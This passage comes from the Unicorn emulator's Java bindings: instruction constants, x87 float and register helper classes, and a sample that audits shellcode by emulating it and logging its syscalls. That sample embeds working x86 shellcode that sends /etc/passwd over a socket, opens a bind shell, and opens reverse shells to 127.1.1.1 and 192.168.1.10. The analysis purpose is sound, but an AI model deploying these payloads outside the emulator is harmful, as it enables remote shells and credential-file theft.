= 1197; public static final int UC_X86_INS_VPSIGNB = 1198; public static final int UC_X86_INS_VPSIGND = 1199; public static final int UC_X86_INS_VPSIGNW = 1200; public static final int UC_X86_INS_VPSLLDQ = 1201; public static final int UC_X86_INS_VPSLLD = 1202; public static final int UC_X86_INS_VPSLLQ = 1203; public static final int UC_X86_INS_VPSLLVD = 1204; public static final int UC_X86_INS_VPSLLVQ = 1205; public static final int UC_X86_INS_VPSLLW = 1206; public static final int UC_X86_INS_VPSRAD = 1207; public static final int UC_X86_INS_VPSRAQ = 1208; public static final int UC_X86_INS_VPSRAVD = 1209; public static final int UC_X86_INS_VPSRAVQ = 1210; public static final int UC_X86_INS_VPSRAW 
= 1211; public static final int UC_X86_INS_VPSRLDQ = 1212; public static final int UC_X86_INS_VPSRLD = 1213; public static final int UC_X86_INS_VPSRLQ = 1214; public static final int UC_X86_INS_VPSRLVD = 1215; public static final int UC_X86_INS_VPSRLVQ = 1216; public static final int UC_X86_INS_VPSRLW = 1217; public static final int UC_X86_INS_VPSUBB = 1218; public static final int UC_X86_INS_VPSUBD = 1219; public static final int UC_X86_INS_VPSUBQ = 1220; public static final int UC_X86_INS_VPSUBSB = 1221; public static final int UC_X86_INS_VPSUBSW = 1222; public static final int UC_X86_INS_VPSUBUSB = 1223; public static final int UC_X86_INS_VPSUBUSW = 1224; public static final int UC_X86_INS_VPSUBW = 1225; public static final int UC_X86_INS_VPTESTMD = 1226; public static final int UC_X86_INS_VPTESTMQ = 1227; public static final int UC_X86_INS_VPTESTNMD = 1228; public static final int UC_X86_INS_VPTESTNMQ = 1229; public static final int UC_X86_INS_VPTEST = 1230; public static final int UC_X86_INS_VPUNPCKHBW = 1231; public static final int UC_X86_INS_VPUNPCKHDQ = 1232; public static final int UC_X86_INS_VPUNPCKHQDQ = 1233; public static final int UC_X86_INS_VPUNPCKHWD = 1234; public static final int UC_X86_INS_VPUNPCKLBW = 1235; public static final int UC_X86_INS_VPUNPCKLDQ = 1236; public static final int UC_X86_INS_VPUNPCKLQDQ = 1237; public static final int UC_X86_INS_VPUNPCKLWD = 1238; public static final int UC_X86_INS_VPXORD = 1239; public static final int UC_X86_INS_VPXORQ = 1240; public static final int UC_X86_INS_VPXOR = 1241; public static final int UC_X86_INS_VRCP14PD = 1242; public static final int UC_X86_INS_VRCP14PS = 1243; public static final int UC_X86_INS_VRCP14SD = 1244; public static final int UC_X86_INS_VRCP14SS = 1245; public static final int UC_X86_INS_VRCP28PD = 1246; public static final int UC_X86_INS_VRCP28PS = 1247; public static final int UC_X86_INS_VRCP28SD = 1248; public static final int UC_X86_INS_VRCP28SS = 1249; public static final int UC_X86_INS_VRCPPS = 1250; public static final int UC_X86_INS_VRCPSS = 1251; public static final int UC_X86_INS_VRNDSCALEPD = 1252; public static final int UC_X86_INS_VRNDSCALEPS = 1253; public static final int UC_X86_INS_VRNDSCALESD = 1254; public static final int UC_X86_INS_VRNDSCALESS = 1255; public static final int UC_X86_INS_VROUNDPD = 1256; public static final int UC_X86_INS_VROUNDPS = 1257; public static final int UC_X86_INS_VROUNDSD = 1258; public static final int UC_X86_INS_VROUNDSS = 1259; public static final int UC_X86_INS_VRSQRT14PD = 1260; public static final int UC_X86_INS_VRSQRT14PS = 1261; public static final int UC_X86_INS_VRSQRT14SD = 1262; public static final int UC_X86_INS_VRSQRT14SS = 1263; public static final int UC_X86_INS_VRSQRT28PD = 1264; public static final int UC_X86_INS_VRSQRT28PS = 1265; public static final int UC_X86_INS_VRSQRT28SD = 1266; public static final int UC_X86_INS_VRSQRT28SS = 1267; public static final int UC_X86_INS_VRSQRTPS = 1268; public static final int UC_X86_INS_VRSQRTSS = 1269; public static final int UC_X86_INS_VSCATTERDPD = 1270; public static final int UC_X86_INS_VSCATTERDPS = 1271; public static final int UC_X86_INS_VSCATTERPF0DPD = 1272; public static final int UC_X86_INS_VSCATTERPF0DPS = 1273; public static final int UC_X86_INS_VSCATTERPF0QPD = 1274; public static final int UC_X86_INS_VSCATTERPF0QPS = 1275; public static final int UC_X86_INS_VSCATTERPF1DPD = 1276; public static final int UC_X86_INS_VSCATTERPF1DPS = 1277; public static final int UC_X86_INS_VSCATTERPF1QPD = 
1278; public static final int UC_X86_INS_VSCATTERPF1QPS = 1279; public static final int UC_X86_INS_VSCATTERQPD = 1280; public static final int UC_X86_INS_VSCATTERQPS = 1281; public static final int UC_X86_INS_VSHUFPD = 1282; public static final int UC_X86_INS_VSHUFPS = 1283; public static final int UC_X86_INS_VSQRTPD = 1284; public static final int UC_X86_INS_VSQRTPS = 1285; public static final int UC_X86_INS_VSQRTSD = 1286; public static final int UC_X86_INS_VSQRTSS = 1287; public static final int UC_X86_INS_VSTMXCSR = 1288; public static final int UC_X86_INS_VSUBPD = 1289; public static final int UC_X86_INS_VSUBPS = 1290; public static final int UC_X86_INS_VSUBSD = 1291; public static final int UC_X86_INS_VSUBSS = 1292; public static final int UC_X86_INS_VTESTPD = 1293; public static final int UC_X86_INS_VTESTPS = 1294; public static final int UC_X86_INS_VUNPCKHPD = 1295; public static final int UC_X86_INS_VUNPCKHPS = 1296; public static final int UC_X86_INS_VUNPCKLPD = 1297; public static final int UC_X86_INS_VUNPCKLPS = 1298; public static final int UC_X86_INS_VZEROALL = 1299; public static final int UC_X86_INS_VZEROUPPER = 1300; public static final int UC_X86_INS_WAIT = 1301; public static final int UC_X86_INS_WBINVD = 1302; public static final int UC_X86_INS_WRFSBASE = 1303; public static final int UC_X86_INS_WRGSBASE = 1304; public static final int UC_X86_INS_WRMSR = 1305; public static final int UC_X86_INS_XABORT = 1306; public static final int UC_X86_INS_XACQUIRE = 1307; public static final int UC_X86_INS_XBEGIN = 1308; public static final int UC_X86_INS_XCHG = 1309; public static final int UC_X86_INS_XCRYPTCBC = 1310; public static final int UC_X86_INS_XCRYPTCFB = 1311; public static final int UC_X86_INS_XCRYPTCTR = 1312; public static final int UC_X86_INS_XCRYPTECB = 1313; public static final int UC_X86_INS_XCRYPTOFB = 1314; public static final int UC_X86_INS_XEND = 1315; public static final int UC_X86_INS_XGETBV = 1316; public static final int UC_X86_INS_XLATB = 1317; public static final int UC_X86_INS_XRELEASE = 1318; public static final int UC_X86_INS_XRSTOR = 1319; public static final int UC_X86_INS_XRSTOR64 = 1320; public static final int UC_X86_INS_XRSTORS = 1321; public static final int UC_X86_INS_XRSTORS64 = 1322; public static final int UC_X86_INS_XSAVE = 1323; public static final int UC_X86_INS_XSAVE64 = 1324; public static final int UC_X86_INS_XSAVEC = 1325; public static final int UC_X86_INS_XSAVEC64 = 1326; public static final int UC_X86_INS_XSAVEOPT = 1327; public static final int UC_X86_INS_XSAVEOPT64 = 1328; public static final int UC_X86_INS_XSAVES = 1329; public static final int UC_X86_INS_XSAVES64 = 1330; public static final int UC_X86_INS_XSETBV = 1331; public static final int UC_X86_INS_XSHA1 = 1332; public static final int UC_X86_INS_XSHA256 = 1333; public static final int UC_X86_INS_XSTORE = 1334; public static final int UC_X86_INS_XTEST = 1335; public static final int UC_X86_INS_FDISI8087_NOP = 1336; public static final int UC_X86_INS_FENI8087_NOP = 1337; public static final int UC_X86_INS_ENDING = 1338; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86_Float80.java000066400000000000000000000043161467524106700245640ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. 
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** An 80-bit x87 extended-precision float: a 64-bit mantissa with an explicit integer bit at bit 63, and a 16-bit word holding the sign in bit 15 and a biased exponent (bias 16383) in bits 14-0. */ public class X86_Float80 { public long mantissa; public short exponent; public X86_Float80(long mantissa, short exponent) { this.mantissa = mantissa; this.exponent = exponent; } public double toDouble() { boolean sign = (exponent & 0x8000) != 0; int exp = exponent & 0x7fff; if (exp == 0) { /* zero or denormal; denormals collapse to a signed zero here */ return sign ? -0.0 : 0.0; } else if (exp == 0x7fff) { /* all-ones exponent: infinity if the top fraction bit is clear, NaN otherwise */ if (((mantissa >> 62) & 1) == 0) { return sign ? Double.NEGATIVE_INFINITY : Double.POSITIVE_INFINITY; } else { return Double.NaN; } } else { /* value = mantissa * 2^(exp - 16383 - 63); shift the mantissa right once so it fits in a non-negative double before rescaling */ exp -= 16383; double f = mantissa >>> 1; return Math.scalb(sign ? -f : f, exp - 62); } } public static X86_Float80 fromDouble(double val) { if (Double.isNaN(val)) { /* all-ones mantissa and exponent encode a NaN */ return new X86_Float80(-1L, (short) -1); } else if (Double.isInfinite(val)) { /* integer bit only, all-ones exponent: infinity */ return new X86_Float80(1L << 63, (short) (val < 0 ? 0xffff : 0x7fff)); } else { /* scale |val| into [2^62, 2^63), then shift left once to place the explicit integer bit at bit 63 */ int exp = Math.getExponent(val); long mantissa = ((long) Math.scalb(Math.abs(val), 62 - exp)) << 1; exp += 16383; return new X86_Float80(mantissa, (short) (val < 0 ? (exp | 0x8000) : exp)); } } @Override public String toString() { return "X86_Float80 [mantissa=" + mantissa + ", exponent=" + exponent + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86_MMR.java000066400000000000000000000026311467524106700240000ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2016 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. */ public class X86_MMR { public long base; public int limit; public int flags; public short selector; public X86_MMR(long base, int limit, int flags, short selector) { this.base = base; this.limit = limit; this.flags = flags; this.selector = selector; } public X86_MMR(long base, int limit) { this.base = base; this.limit = limit; selector = 0; flags = 0; } @Override public String toString() { return "X86_MMR [base=" + base + ", limit=" + limit + ", flags=" + flags + ", selector=" + selector + "]"; } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86_MSR.java000066400000000000000000000021151467524106700240030ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Model-specific register */ public class X86_MSR { public int rid; public long value; public X86_MSR(int rid) { this(rid, 0); } public X86_MSR(int rid, long value) { this.rid = rid; this.value = value; } @Override public String toString() { return "X86_MSR [rid=" + rid + ", value=" + value + "]"; } } unicorn-2.1.1/bindings/java/src/test/000077500000000000000000000000001467524106700174705ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/000077500000000000000000000000001467524106700204115ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/samples/000077500000000000000000000000001467524106700220555ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/test/java/samples/SampleNetworkAuditing.java000066400000000000000000000455201467524106700272060ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn sample for auditing network connection and file handling in shellcode. 
Nguyen Tan Cong */ package samples; import unicorn.*; import java.util.*; public class SampleNetworkAuditing implements UnicornConst, X86Const { public static long next_id = 3; public static final int SIZE_REG = 4; private static LogChain fd_chains = new LogChain(); public static long get_id() { return next_id++; } public static final long toInt(byte val[]) { long res = 0; for (int i = 0; i < val.length; i++) { long v = val[i] & 0xff; res = res + (v << (i * 8)); } return res; } public static final byte[] toBytes(long val) { byte[] res = new byte[8]; for (int i = 0; i < 8; i++) { res[i] = (byte) (val & 0xff); val >>>= 8; } return res; } private static class MyInterruptHook implements InterruptHook { // callback for tracing Linux interrupt public void hook(Unicorn uc, int intno, Object user) { // System.err.println(String.format("Interrupt 0x%x, from Unicorn 0x%x", intno, u.hashCode())); // only handle Linux syscall if (intno != 0x80) { return; } long eax = uc.reg_read(UC_X86_REG_EAX); long ebx = uc.reg_read(UC_X86_REG_EBX); long ecx = uc.reg_read(UC_X86_REG_ECX); long edx = uc.reg_read(UC_X86_REG_EDX); long eip = uc.reg_read(UC_X86_REG_EIP); // System.out.printf(">>> INTERRUPT %d\n", toInt(eax)); if (eax == 1) { // sys_exit System.out.printf(">>> SYS_EXIT\n"); uc.emu_stop(); } else if (eax == 3) { // sys_read long fd = ebx; long buf = ecx; long count = edx; String uuid = UUID.randomUUID().toString().substring(0, 32); byte[] dummy_content = Arrays.copyOfRange(uuid.getBytes(), 0, (int) Math.min(count, uuid.length())); uc.mem_write(buf, dummy_content); String msg = String.format( "read %d bytes from fd(%d) with dummy_content(%s)", count, fd, uuid.substring(0, dummy_content.length)); fd_chains.add_log(fd, msg); System.out.printf(">>> %s\n", msg); } else if (eax == 4) { // sys_write long fd = ebx; long buf = ecx; long count = edx; byte[] content = uc.mem_read(buf, (int) count); String msg = String.format("write data=%s count=%d to fd(%d)", new String(content), count, fd); System.out.printf(">>> %s\n", msg); fd_chains.add_log(fd, msg); } else if (eax == 5) { // sys_open long filename_addr = ebx; long flags = ecx; long mode = edx; String filename = read_string(uc, filename_addr); long dummy_fd = get_id(); uc.reg_write(UC_X86_REG_EAX, dummy_fd); String msg = String.format( "open file (filename=%s flags=%d mode=%d) with fd(%d)", filename, flags, mode, dummy_fd); fd_chains.create_chain(dummy_fd); fd_chains.add_log(dummy_fd, msg); System.out.printf(">>> %s\n", msg); } else if (eax == 11) { // sys_execv // System.out.printf(">>> ebx=0x%x, ecx=0x%x, edx=0x%x\n", ebx, ecx, edx)); String filename = read_string(uc, ebx); System.out.printf(">>> SYS_EXECV filename=%s\n", filename); } else if (eax == 63) { // sys_dup2 fd_chains.link_fd(ecx, ebx); System.out.printf(">>> SYS_DUP2 oldfd=%d newfd=%d\n", ebx, ecx); } else if (eax == 102) { // sys_socketcall // ref: http://www.skyfree.org/linux/kernel_network/socket.html long call = uc.reg_read(UC_X86_REG_EBX); long args = uc.reg_read(UC_X86_REG_ECX); // int sys_socketcall(int call, unsigned long *args) if (call == 1) { // sys_socket // err = sys_socket(a0,a1,a[2]) // int sys_socket(int family, int type, int protocol) long family = toInt(uc.mem_read(args, SIZE_REG)); long sock_type = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long protocol = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); long dummy_fd = get_id(); uc.reg_write(UC_X86_REG_EAX, dummy_fd); if (family == 2) { // AF_INET String msg = String.format("create socket (%s, %s) with fd(%d)", 
ADDR_FAMILY.get(family), SOCKET_TYPES.get(sock_type), dummy_fd); fd_chains.create_chain(dummy_fd); fd_chains.add_log(dummy_fd, msg); print_sockcall(msg); } else if (family == 3) { // AF_INET6 } } else if (call == 2) { // sys_bind long fd = toInt(uc.mem_read(args, SIZE_REG)); long umyaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); byte[] sock_addr = uc.mem_read(umyaddr, (int) addrlen); String msg = String.format("fd(%d) bind to %s", fd, parse_sock_address(sock_addr)); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 3) { // sys_connect // err = sys_connect(a0, (struct sockaddr *)a1, a[2]) // int sys_connect(int fd, struct sockaddr *uservaddr, int addrlen) long fd = toInt(uc.mem_read(args, SIZE_REG)); long uservaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); byte[] sock_addr = uc.mem_read(uservaddr, (int) addrlen); String msg = String.format("fd(%d) connect to %s", fd, parse_sock_address(sock_addr)); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 4) { // sys_listen long fd = toInt(uc.mem_read(args, SIZE_REG)); long backlog = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); String msg = String.format( "fd(%d) listened with backlog=%d", fd, backlog); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 5) { // sys_accept long fd = toInt(uc.mem_read(args, SIZE_REG)); long upeer_sockaddr = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long upeer_addrlen = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); // System.out.printf(">>> upeer_sockaddr=0x%x, upeer_addrlen=%d\n" % (upeer_sockaddr, upeer_addrlen)) if (upeer_sockaddr == 0x0) { print_sockcall( String.format("fd(%d) accept client", fd)); } else { long upeer_len = toInt(uc.mem_read(upeer_addrlen, 4)); byte[] sock_addr = uc.mem_read(upeer_sockaddr, (int) upeer_len); String msg = String.format("fd(%d) accept client with upeer=%s", fd, parse_sock_address(sock_addr)); fd_chains.add_log(fd, msg); print_sockcall(msg); } } else if (call == 9) { // sys_send long fd = toInt(uc.mem_read(args, SIZE_REG)); long buff = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long length = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); byte[] buf = uc.mem_read(buff, (int) length); String msg = String.format("fd(%d) send data=%s", fd, new String(buf)); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 11) { // sys_receive long fd = toInt(uc.mem_read(args, SIZE_REG)); long ubuf = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); long size = toInt(uc.mem_read(args + SIZE_REG * 2, SIZE_REG)); long flags = toInt(uc.mem_read(args + SIZE_REG * 3, SIZE_REG)); String msg = String.format( "fd(%d) is going to receive data with size=%d flags=%d", fd, size, flags); fd_chains.add_log(fd, msg); print_sockcall(msg); } else if (call == 13) { // sys_shutdown long fd = toInt(uc.mem_read(args, SIZE_REG)); long how = toInt(uc.mem_read(args + SIZE_REG, SIZE_REG)); String msg = String.format( "fd(%d) is shut down because of %d", fd, how); fd_chains.add_log(fd, msg); print_sockcall(msg); } } } public static final Hashtable<Long, String> SOCKET_TYPES; public static final Hashtable<Long, String> ADDR_FAMILY; static { SOCKET_TYPES = new Hashtable<>(); ADDR_FAMILY = new Hashtable<>(); SOCKET_TYPES.put(1L, "SOCK_STREAM"); SOCKET_TYPES.put(2L, "SOCK_DGRAM"); SOCKET_TYPES.put(3L, "SOCK_RAW"); SOCKET_TYPES.put(4L, "SOCK_RDM"); SOCKET_TYPES.put(5L,
"SOCK_SEQPACKET"); SOCKET_TYPES.put(10L, "SOCK_PACKET"); ADDR_FAMILY.put(0L, "AF_UNSPEC"); ADDR_FAMILY.put(1L, "AF_UNIX"); ADDR_FAMILY.put(2L, "AF_INET"); ADDR_FAMILY.put(3L, "AF_AX25"); ADDR_FAMILY.put(4L, "AF_IPX"); ADDR_FAMILY.put(5L, "AF_APPLETALK"); ADDR_FAMILY.put(6L, "AF_NETROM"); ADDR_FAMILY.put(7L, "AF_BRIDGE"); ADDR_FAMILY.put(8L, "AF_AAL5"); ADDR_FAMILY.put(9L, "AF_X25"); ADDR_FAMILY.put(10L, "AF_INET6"); ADDR_FAMILY.put(12L, "AF_MAX"); } // http://shell-storm.org/shellcode/files/shellcode-861.php public static final byte[] X86_SEND_ETCPASSWD = { 106, 102, 88, 49, -37, 67, 49, -46, 82, 106, 1, 106, 2, -119, -31, -51, -128, -119, -58, 106, 102, 88, 67, 104, 127, 1, 1, 1, 102, 104, 48, 57, 102, 83, -119, -31, 106, 16, 81, 86, -119, -31, 67, -51, -128, -119, -58, 106, 1, 89, -80, 63, -51, -128, -21, 39, 106, 5, 88, 91, 49, -55, -51, -128, -119, -61, -80, 3, -119, -25, -119, -7, 49, -46, -74, -1, -78, -1, -51, -128, -119, -62, 106, 4, 88, -77, 1, -51, -128, 106, 1, 88, 67, -51, -128, -24, -44, -1, -1, -1, 47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100 }; // http://shell-storm.org/shellcode/files/shellcode-882.php public static final byte[] X86_BIND_TCP = { 106, 102, 88, 106, 1, 91, 49, -10, 86, 83, 106, 2, -119, -31, -51, -128, 95, -105, -109, -80, 102, 86, 102, 104, 5, 57, 102, 83, -119, -31, 106, 16, 81, 87, -119, -31, -51, -128, -80, 102, -77, 4, 86, 87, -119, -31, -51, -128, -80, 102, 67, 86, 86, 87, -119, -31, -51, -128, 89, 89, -79, 2, -109, -80, 63, -51, -128, 73, 121, -7, -80, 11, 104, 47, 47, 115, 104, 104, 47, 98, 105, 110, -119, -29, 65, -119, -54, -51, -128 }; // http://shell-storm.org/shellcode/files/shellcode-883.php public static final byte[] X86_REVERSE_TCP = { 106, 102, 88, 106, 1, 91, 49, -46, 82, 83, 106, 2, -119, -31, -51, -128, -110, -80, 102, 104, 127, 1, 1, 1, 102, 104, 5, 57, 67, 102, 83, -119, -31, 106, 16, 81, 82, -119, -31, 67, -51, -128, 106, 2, 89, -121, -38, -80, 63, -51, -128, 73, 121, -7, -80, 11, 65, -119, -54, 82, 104, 47, 47, 115, 104, 104, 47, 98, 105, 110, -119, -29, -51, -128 }; // http://shell-storm.org/shellcode/files/shellcode-849.php public static final byte[] X86_REVERSE_TCP_2 = { 49, -64, 49, -37, 49, -55, 49, -46, -80, 102, -77, 1, 81, 106, 6, 106, 1, 106, 2, -119, -31, -51, -128, -119, -58, -80, 102, 49, -37, -77, 2, 104, -64, -88, 1, 10, 102, 104, 122, 105, 102, 83, -2, -61, -119, -31, 106, 16, 81, 86, -119, -31, -51, -128, 49, -55, -79, 3, -2, -55, -80, 63, -51, -128, 117, -8, 49, -64, 82, 104, 110, 47, 115, 104, 104, 47, 47, 98, 105, -119, -29, 82, 83, -119, -31, 82, -119, -30, -80, 11, -51, -128 }; // memory address where emulation starts public static final int ADDRESS = 0x1000000; public static String join(ArrayList<String> l, String sep) { boolean first = true; StringBuilder res = new StringBuilder(); for (String s : l) { if (!first) { res.append(sep); } res.append(s); first = false; } return res.toString(); } private static class LogChain { public Hashtable<Long, ArrayList<String>> __chains = new Hashtable<>(); public Hashtable<Long, ArrayList<Long>> __linking_fds = new Hashtable<>(); public void clean() { __chains.clear(); __linking_fds.clear(); } public void create_chain(long id) { if (!__chains.containsKey(id)) { __chains.put(id, new ArrayList<String>()); } else { System.out.printf("LogChain: id %d already exists\n", id); } } public void add_log(long id, String msg) { long fd = get_original_fd(id); if (fd != -1) { __chains.get(fd).add(msg); } else { System.out.printf("LogChain: id %d doesn't exist\n", id); } } public void link_fd(long from_fd, long to_fd) { if (!__linking_fds.containsKey(to_fd)) { __linking_fds.put(to_fd, new ArrayList<Long>()); } __linking_fds.get(to_fd).add(from_fd); } public long get_original_fd(long fd) { if (__chains.containsKey(fd)) { return fd; } for (Long orig_fd : __linking_fds.keySet()) { if (__linking_fds.get(orig_fd).contains(fd)) return orig_fd; } return -1; } public void print_report() { System.out.printf("\n----------------"); System.out.printf("\n| START REPORT |"); System.out.printf("\n----------------\n\n"); for (Long fd : __chains.keySet()) { System.out.printf("---- START FD(%d) ----\n", fd); System.out.println(join(__chains.get(fd), "\n")); System.out.printf("---- END FD(%d) ----\n", fd); } System.out.printf("\n--------------"); System.out.printf("\n| END REPORT |"); System.out.printf("\n--------------\n\n"); } } // end supported classes // utilities static String read_string(Unicorn uc, long addr) { StringBuilder ret = new StringBuilder(); char c; do { c = (char) (uc.mem_read(addr++, 1)[0] & 0xff); if (c != 0) { ret.append(c); } } while (c != 0); return ret.toString(); } static String parse_sock_address(byte[] sock_addr) { int sin_family = ((sock_addr[0] & 0xff) + (sock_addr[1] << 8)) & 0xffff; if (sin_family == 2) { // AF_INET int sin_port = ((sock_addr[3] & 0xff) + (sock_addr[2] << 8)) & 0xffff; return String.format("%d.%d.%d.%d:%d", sock_addr[4] & 0xff, sock_addr[5] & 0xff, sock_addr[6] & 0xff, sock_addr[7] & 0xff, sin_port); } else if (sin_family == 10) // AF_INET6 return ""; return null; } static void print_sockcall(String msg) { System.out.printf(">>> SOCKCALL %s\n", msg); } // end utilities public static void test_i386(byte[] code) { fd_chains.clean(); System.out.printf("Emulate i386 code\n"); try { // Initialize emulator in X86-32bit mode Unicorn mu = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation mu.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory mu.mem_write(ADDRESS, code); // initialize stack mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000L); // handle interrupt ourself mu.hook_add(new MyInterruptHook(), null); // emulate machine code in infinite time mu.emu_start(ADDRESS, ADDRESS + code.length, 0, 0); // now print out some registers System.out.printf(">>> Emulation done\n"); } catch (UnicornException uex) { System.out.printf("ERROR: %s\n", uex.getMessage()); } fd_chains.print_report(); } public static void main(String args[]) { test_i386(X86_SEND_ETCPASSWD); test_i386(X86_BIND_TCP); test_i386(X86_REVERSE_TCP); test_i386(X86_REVERSE_TCP_2); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_arm.java000066400000000000000000000257751467524106700250140ustar00rootroot00000000000000/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate ARM code */ package samples; import java.util.Arrays; import unicorn.*; public class Sample_arm implements UnicornConst, ArmConst { /** code to be emulated {@code mov r0, #0x37; sub r1, r2, r3} */ // private static final byte[] ARM_CODE = Utils.hexToBytes("3700a0e3031042e0"); /** code to be emulated {@code nop} */ private static final byte[] ARM_CODE = Utils.hexToBytes("00f020e3"); /** code to be emulated {@code sub sp, #0xc} */ private static final byte[] THUMB_CODE = Utils.hexToBytes("83b0"); /** code to be emulated *

     * cmp r2, r3
     * ite ne
     * mov r2, #0x68
     * mov r2, #0x4d
     * 
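     * (Decoding note: halfword 0xbf14 is an ITE block, so with r2 = 0 and
     * r3 = 1 the cmp sets NE, the NE-conditional mov runs, the
     * EQ-conditional mov is skipped, and r2 ends up as 0x68; see
     * test_thumb_ite below.)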
*/ private static final byte[] ARM_THUMB_COND_CODE = Utils.hexToBytes("9a4214bf68224d22"); /** code to be emulated {@code mov r0, #0x37; sub r1, r2, r3} */ private static final byte[] ARM_CODE_EB = Utils.hexToBytes("e3a00037e0421003"); /** code to be emulated {@code sub sp, #0xc} */ private static final byte[] THUMB_CODE_EB = Utils.hexToBytes("b083"); /** {@code 0xf3ef8014 - mrs r0, control} */ private static final byte[] THUMB_CODE_MRS = Utils.hexToBytes("eff31480"); /** memory address where emulation starts */ private static final long ADDRESS = 0x10000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); }; public static void test_arm() { long r0 = 0x1234L; // R0 register long r2 = 0x6789L; // R2 register long r3 = 0x3333L; // R3 register System.out.println("Emulate ARM code"); // Initialize emulator in ARM mode Unicorn u = new Unicorn(UC_ARCH_ARM, UC_MODE_ARM); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, ARM_CODE); // initialize machine registers u.reg_write(UC_ARM_REG_R0, r0); u.reg_write(UC_ARM_REG_R2, r2); u.reg_write(UC_ARM_REG_R3, r3); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS, ADDRESS + ARM_CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> R0 = 0x%x\n", u.reg_read(UC_ARM_REG_R0)); System.out.format(">>> R1 = 0x%x\n", u.reg_read(UC_ARM_REG_R1)); } public static void test_thumb() { long sp = 0x1234L; // SP register System.out.println("Emulate THUMB code"); // Initialize emulator in ARM mode Unicorn u = new Unicorn(UC_ARCH_ARM, UC_MODE_THUMB); // map 2MB memory for this emulation u.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory u.mem_write(ADDRESS, THUMB_CODE); // initialize machine registers u.reg_write(UC_ARM_REG_SP, sp); // tracing all basic blocks with customized callback u.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback u.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. u.emu_start(ADDRESS | 1, ADDRESS + THUMB_CODE.length, 0, 